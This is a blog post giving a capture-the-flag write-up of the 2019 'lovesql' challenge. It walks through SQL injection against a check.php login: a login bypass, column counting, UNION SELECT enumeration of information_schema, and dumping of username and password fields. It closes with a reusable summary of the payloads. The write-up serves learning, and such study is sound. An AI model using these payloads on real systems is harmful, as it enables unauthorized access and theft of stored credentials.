Fading Coder

One Final Commit for the Last Sprint

Home > Tech > Content

2019 lovesql Challenge Analysis

Tech May 12 2

Upon inspection of the URL, it shows: check.php?username=admin&password=password.

To proceed, a SQL injection test is performed using the universal bypass technique:

Username: 1' or 1=1#
Password: 123 (any input)

This reveals the actual username is admin and the password hash is 8cd4984005351346e19adc4dcebabfc0.

Next, determine the number of columns in the query using the ORDER BY clause:

check.php?username=admin' order by 3%23&password=1 (valid)
check.php?username=admin' order by 4%23&password=1 (error)

This confirms that there are three columns.

Using a UNION SELECT query to identify which columns are reflected in the output:

check.php?username=1' union select 1,2,3%23&password=1

Columns 2 and 3 are confirmed as injectable.

Retrieve database name and version:

check.php?username=1' union select 1,database(),version()%23&password=1

With the database identified, find all tables:

check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

Two table are found: geekuser and l0ve1ysq1.

Check columns within each table:

check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=1
check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

Both tables contain fields: id, username, and password.

Extract data from both tables:

check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

No flag is found in this table. Proceed to the other:

check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

The flag is discovered: flag{763cf102-e6b0-4085-88cc-4eeb7cbc8a83}.

Summary of exploitation steps:

  1. Determine column count: 1' order by 1 #
  2. Verify output reflection: 1' union select 1,2,3 #
  3. Fetch database info: 1' union select 1,database(),version() #
  4. List tables: 1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() #
  5. Retrieve column names: 1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='AAA' #
  6. Extract data to find flag: 1' union select 1,2,group_concat(id,username,password) from AAA%23&password=1

Alternative method using ASCII encoding:

1' union select 1,2,group_concat(username,0x40,password) from AAA%23&password=1
Tags: SQL InjectionWeb Security
Back to List

Prev: Linux Process Lifecycle and Administration

Next: Breadth-First Search Implementation for Directed Graphs in Go

Related Articles

Understanding Strong and Weak References in Java

Strong References Strong reference are the most prevalent type of object referencing in Java. When an object has a strong reference pointing to it, the garbage collector will not reclaim its memory. F...

Comprehensive Guide to SSTI Explained with Payload Bypass Techniques

Introduction Server-Side Template Injection (SSTI) is a vulnerability in web applications where user input is improper handled within the template engine and executed on the server. This exploit can r...

Implement Image Upload Functionality for Django Integrated TinyMCE Editor

Django’s Admin panel is highly user-friendly, and pairing it with TinyMCE, an effective rich text editor, simplifies content management significantly. Combining the two is particular useful for bloggi...

Leave a Comment

Anonymous

◎Feel free to join the discussion and share your thoughts.

Copyright © fadingcoder.top